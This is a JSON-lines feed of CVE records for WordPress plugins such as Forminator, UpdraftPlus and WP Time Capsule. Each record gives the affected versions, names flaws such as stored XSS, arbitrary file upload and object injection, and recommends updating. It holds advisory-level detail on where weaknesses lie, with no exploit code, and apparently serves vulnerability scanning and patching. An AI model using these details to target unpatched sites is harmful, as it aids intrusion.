{"CVE_ID":"CVE-2023-5119","slug":"forminator","versionImpact":"1.26.0","versionEndExcluding":"1.27.0","description":"The Forminator WordPress plugin before 1.27.0 does not properly sanitize the redirect-url field in the form submission settings, which could allow high-privilege users such as an administrator to inject arbitrary web scripts even when the unfiltered_html capability is disallowed (for example in a multisite setup).","recommendation":"Update to version 1.27.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229207bb-8f8d-4579-a8e2-54516474ccb4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/229207bb-8f8d-4579-a8e2-54516474ccb4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1288","slug":"schema-and-structured-data-for-wp","versionImpact":"1.26","versionEndExcluding":"1.27","description":"The Schema & Structured Data for WP & AMP plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'saswp_reviews_form_render' function in all versions up to, and including, 1.26. This makes it possible for authenticated attackers, with contributor access and above, to modify the plugin's stored reCaptcha site and secret keys, potentially breaking the reCaptcha functionality.","recommendation":"Update to version 1.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac13f402-8a36-448f-87d4-48179a9699c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac13f402-8a36-448f-87d4-48179a9699c6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/schema-and-structured-data-for-wp\\\/trunk\\\/modules\\\/reviews\\\/reviews_form.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/schema-and-structured-data-for-wp\\\/trunk\\\/modules\\\/reviews\\\/reviews_form.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.26&old=3038020&new_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.27&new=3038020&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.26&old=3038020&new_path=\\\/schema-and-structured-data-for-wp\\\/tags\\\/1.27&new=3038020&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4734","slug":"import-users-from-csv-with-meta","versionImpact":"1.26.6.1","versionEndExcluding":"1.26.7","description":"The Import and export users and customers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.26.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.26.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dca168f-a383-42fc-91ba-d78a5d7e6724?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dca168f-a383-42fc-91ba-d78a5d7e6724?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085346%40import-users-from-csv-with-meta%2Ftrunk&old=3078277%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085346%40import-users-from-csv-with-meta%2Ftrunk&old=3078277%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4656","slug":"import-users-from-csv-with-meta","versionImpact":"1.26.6.1","versionEndExcluding":"1.26.7","description":"The Import and export users and customers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user agent header in all versions up to, and including, 1.26.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.26.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af742451-b2d6-445a-9a10-e950490f6c7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af742451-b2d6-445a-9a10-e950490f6c7c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085346%40import-users-from-csv-with-meta%2Ftrunk&old=3078277%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085346%40import-users-from-csv-with-meta%2Ftrunk&old=3078277%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1050","slug":"import-users-from-csv-with-meta","versionImpact":"1.26.5","versionEndExcluding":"1.26.6","description":"The Import and export users and customers plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_force_reset_password_delete_metas() function in all versions up to, and including, 1.26.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete all forced password resets.","recommendation":"Update to version 1.26.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2fbd599-0a6c-4182-87d9-ad7cf3fb5865?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d2fbd599-0a6c-4182-87d9-ad7cf3fb5865?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-users-from-csv-with-meta\\\/trunk\\\/classes\\\/force-reset-password.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/import-users-from-csv-with-meta\\\/trunk\\\/classes\\\/force-reset-password.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077276%40import-users-from-csv-with-meta&new=3077276%40import-users-from-csv-with-meta&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077276%40import-users-from-csv-with-meta&new=3077276%40import-users-from-csv-with-meta&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4400","slug":"post-and-page-builder","versionImpact":"1.26.4","versionEndExcluding":"1.26.5","description":"The Post and Page Builder by BoldGrid \u2013 Visual Drag and Drop Editor plguin for WordPress is vulnerable to Stored Cross-Site Scripting via an unknown parameter in versions up to, and including, 1.26.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.26.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bb6683a-b8e6-4776-880f-5b48966fc5c6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9bb6683a-b8e6-4776-880f-5b48966fc5c6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087230\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087230\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10054","slug":"happyforms","versionImpact":"1.26.2","versionEndExcluding":"1.26.3","description":"The Happyforms  WordPress plugin before 1.26.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.26.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a9fd64b-3207-4acb-92ff-1cca08c41ac9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a9fd64b-3207-4acb-92ff-1cca08c41ac9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12034","slug":"advanced-google-recaptcha","versionImpact":"1.25","versionEndExcluding":"1.26","description":"The Advanced Google reCAPTCHA plugin for WordPress is vulnerable to IP unblocking in all versions up to, and including, 1.25. This is due to the plugin not utilizing a strong unique key when generating an unblock request. This makes it possible for unauthenticated attackers to unblock their IP after being locked out due to too many bad password attempts","recommendation":"Update to version 1.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208704%40advanced-google-recaptcha&new=3208704%40advanced-google-recaptcha&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3208704%40advanced-google-recaptcha&new=3208704%40advanced-google-recaptcha&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fa7e6f6-92b2-494b-8c7a-76ba8213b610?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fa7e6f6-92b2-494b-8c7a-76ba8213b610?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1447","slug":"sydney-toolbox","versionImpact":"1.25","versionEndExcluding":"1.26","description":"The Sydney Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aThemes Slider button element in all versions up to, and including, 1.25 due to insufficient input sanitization and output escaping on user supplied link. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1227f3bc-0bb3-4b80-ad69-2d4314fafbe4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1227f3bc-0bb3-4b80-ad69-2d4314fafbe4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-slider.php#L679\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-slider.php#L679\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-slider.php#L692\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sydney-toolbox\\\/trunk\\\/inc\\\/elementor\\\/block-slider.php#L692\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035233%40sydney-toolbox%2Ftrunk&old=2980978%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035233%40sydney-toolbox%2Ftrunk&old=2980978%40sydney-toolbox%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0215","slug":"updraftplus","versionImpact":"1.24.12","versionEndExcluding":"1.25.1","description":"The UpdraftPlus: WP Backup & Migration Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the showdata and initiate_restore parameters in all versions up to, and including, 1.24.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an admin user into performing an action such as clicking on a link.","recommendation":"Update to version 1.25.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/tags\\\/1.24.12\\\/includes\\\/updraft-admin-common.js#L4404\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/tags\\\/1.24.12\\\/includes\\\/updraft-admin-common.js#L4404\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/tags\\\/1.24.12\\\/includes\\\/updraft-admin-common.js#L4439\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/tags\\\/1.24.12\\\/includes\\\/updraft-admin-common.js#L4439\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af568eea-59ce-467e-ba03-625d04d3db6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af568eea-59ce-467e-ba03-625d04d3db6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4596","slug":"forminator","versionEndExcluding":"1.25.0","description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/51664\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/51664\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2954409\\\/forminator\\\/trunk\\\/library\\\/fields\\\/postdata.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2954409\\\/forminator\\\/trunk\\\/library\\\/fields\\\/postdata.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3134","slug":"forminator","versionEndExcluding":"1.24.4","description":"The Forminator WordPress plugin before 1.24.4 does not properly escape values that are being reflected inside form fields that use pre-populated query parameters, which could lead to reflected XSS attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d50d3cc-7563-42c4-977b-f834fee711da\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6d50d3cc-7563-42c4-977b-f834fee711da\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6624","slug":"import-users-from-csv-with-meta","versionImpact":"1.24.3","versionEndExcluding":"1.24.4","description":"The Import and export users and customers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.24.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.24.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4731eb39-8c01-4a2b-80f7-15d8c13a19b5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4731eb39-8c01-4a2b-80f7-15d8c13a19b5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3007926%40import-users-from-csv-with-meta%2Ftrunk&old=3007057%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3007926%40import-users-from-csv-with-meta%2Ftrunk&old=3007057%40import-users-from-csv-with-meta%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6583","slug":"import-users-from-csv-with-meta","versionImpact":"1.24.2","versionEndExcluding":"1.24.3","description":"The Import and export users and customers plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.24.2 via the Recurring Import functionality. This makes it possible for authenticated attackers, with administrator access and above, to read and delete the contents of arbitrary files on the server including wp-config.php, which can contain sensitive information.","recommendation":"Update to version 1.24.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac709779-36f1-4f66-8db3-95a514a5ea59?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac709779-36f1-4f66-8db3-95a514a5ea59?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007057\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007057\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10957","slug":"updraftplus","versionImpact":"1.24.11","versionEndExcluding":"1.24.12","description":"The UpdraftPlus: WP Backup & Migration Plugin plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.24.11 via deserialization of untrusted input in the 'recursive_unserialized_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. An administrator must perform a search and replace action to trigger the exploit.","recommendation":"Update to version 1.24.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/trunk\\\/includes\\\/class-search-replace.php#L411\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/updraftplus\\\/trunk\\\/includes\\\/class-search-replace.php#L411\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212299\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212299\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4729ed37-96b2-4717-8a72-89b9a21ec058?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4729ed37-96b2-4717-8a72-89b9a21ec058?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2010","slug":"forminator","versionEndExcluding":"1.24.1","description":"The Forminator WordPress plugin before 1.24.1 does not use an atomic operation to check whether a user has already voted, and then update that information. This leads to a Race Condition that may allow a single user to vote multiple times on a poll.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d0da4c0d-622f-4310-a867-6bfdb474073a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d0da4c0d-622f-4310-a867-6bfdb474073a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5135","slug":"simple-cloudflare-turnstile","versionImpact":"1.23.1","versionEndExcluding":"1.23.2","description":"The Simple Cloudflare Turnstile plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'gravity-simple-turnstile' shortcode in versions up to, and including, 1.23.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.23.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91f6c9d3-641d-42f7-bf11-e3c3a44eeb76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91f6c9d3-641d-42f7-bf11-e3c3a44eeb76?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/simple-cloudflare-turnstile.php#L72\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/simple-cloudflare-turnstile.php#L72\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/inc\\\/integrations\\\/forms\\\/gravity-forms.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/inc\\\/integrations\\\/forms\\\/gravity-forms.php#L23\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970368\\\/simple-cloudflare-turnstile#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970368\\\/simple-cloudflare-turnstile#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/inc\\\/integrations\\\/forms\\\/gravity-forms.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-cloudflare-turnstile\\\/tags\\\/1.23.0\\\/inc\\\/integrations\\\/forms\\\/gravity-forms.php#L14\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5660","slug":"sendpress","versionImpact":"1.22.3.31","versionEndExcluding":"1.23.11.6","description":"The SendPress Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.22.3.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.23.11.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbce42a0-29a7-40df-973c-1fe7338f6c94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cbce42a0-29a7-40df-973c-1fe7338f6c94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sendpress\\\/tags\\\/1.22.3.31\\\/classes\\\/sc\\\/class-sendpress-sc-unsubscribe-form.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sendpress\\\/tags\\\/1.22.3.31\\\/classes\\\/sc\\\/class-sendpress-sc-unsubscribe-form.php#L57\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5982","slug":"updraftplus","versionImpact":"1.23.10","versionEndExcluding":"1.23.11","description":"The UpdraftPlus: WordPress Backup & Migration Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.23.10. This is due to a lack of nonce validation and insufficient validation of the instance_id on the 'updraftmethod-googledrive-auth' action used to update Google Drive remote storage location. This makes it possible for unauthenticated attackers to modify the Google Drive location that backups are sent to via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This can make it possible for attackers to receive backups for a site which may contain sensitive information.","recommendation":"Update to version 1.23.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1be11c5-0a44-4816-b6bf-d330cb51dbf3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1be11c5-0a44-4816-b6bf-d330cb51dbf3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2989669\\\/updraftplus\\\/tags\\\/1.23.11\\\/class-updraftplus.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2989669\\\/updraftplus\\\/tags\\\/1.23.11\\\/class-updraftplus.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13897","slug":"moving-media-library","versionImpact":"1.22","versionEndExcluding":"1.23","description":"The Moving Media Library plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the generate_json_page function in all versions up to, and including, 1.22. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 1.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/moving-media-library\\\/trunk\\\/lib\\\/class-movingmedialibraryadmin.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/moving-media-library\\\/trunk\\\/lib\\\/class-movingmedialibraryadmin.php#L166\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244709\\\/moving-media-library\\\/trunk\\\/lib\\\/class-movingmedialibraryadmin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244709\\\/moving-media-library\\\/trunk\\\/lib\\\/class-movingmedialibraryadmin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/815ce00b-3753-4c38-8a30-5242a5841734?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/815ce00b-3753-4c38-8a30-5242a5841734?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8856","slug":"wp-time-capsule","versionImpact":"1.22.21","versionEndExcluding":"1.22.22","description":"The Backup and Staging by WP Time Capsule plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the the UploadHandler.php file and no direct file access prevention in all versions up to, and including, 1.22.21. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.22.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc2de78-5601-461f-b2f0-c80b592ccb1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdc2de78-5601-461f-b2f0-c80b592ccb1b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-time-capsule\\\/trunk\\\/wp-tcapsule-bridge\\\/upload\\\/php\\\/UploadHandler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-time-capsule\\\/trunk\\\/wp-tcapsule-bridge\\\/upload\\\/php\\\/UploadHandler.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188325\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188325\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153289%40wp-time-capsule&new=3153289%40wp-time-capsule&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3153289%40wp-time-capsule&new=3153289%40wp-time-capsule&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
